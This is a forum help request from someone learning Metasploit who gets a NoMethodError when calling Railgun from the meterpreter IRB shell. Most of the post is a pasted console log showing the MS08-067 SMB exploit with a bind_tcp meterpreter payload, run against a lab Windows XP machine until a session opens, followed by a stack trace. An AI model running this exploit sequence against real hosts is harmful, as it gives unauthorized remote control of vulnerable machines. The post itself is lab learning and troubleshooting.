Hi guys! I was trying to learn about Metasplooit-Framework and I decided to try out a post-exploitation tool called Railgun. Unfortunately I am unable to figure out this error. I tried this on a Windows XP virtual machine.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm ?MMM MMMM
dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+…+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.1.21-dev- ]
- – --=[ 2187 exploits - 1160 auxiliary - 400 post ]
- – --=[ 596 payloads - 45 encoders - 10 nops ]
module, why not try the reload command
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 172.22.26.226
RHOSTS => 172.22.26.226
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[] 172.22.26.226:445 - Automatically detecting the target…
[] 172.22.26.226:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[] 172.22.26.226:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[] 172.22.26.226:445 - Attempting to trigger the vulnerability…
[] Started bind TCP handler against 172.22.26.226:4444
[] Sending stage (175174 bytes) to 172.22.26.226
[*] Meterpreter session 1 opened (172.22.26.225:39401 → 172.22.26.226:4444 ) at 2021-12-23 21:48:13 +0530
meterpreter > irb
[] Starting IRB shell…
[] You are in the “client” (session) object
irb: warn: can’t alias kill from irb_kill.
client
=> nilclient.railgun
(irb):2:in<main>': undefined method
railgun’ for nil:NilClass (NoMethodError)
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:53:inblock in run' from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:52:in
catch’
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:52:inrun' from /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:587:in
block in cmd_irb’
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell/history_manager.rb:49:inwith_context' from /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:586:in
cmd_irb’
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:563:inrun_command' from /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:102:in
run_command’
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:512:inblock in run_single' from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:506:in
each’
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:506:inrun_single' from /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:64:in
block in interact’
from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:157:inrun' from /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:62:in
interact’
from /opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:559:in_interact' from /opt/metasploit-framework/embedded/framework/lib/rex/ui/interactive.rb:53:in
interact’
… 14 levels…
Can someone please help me with this issue??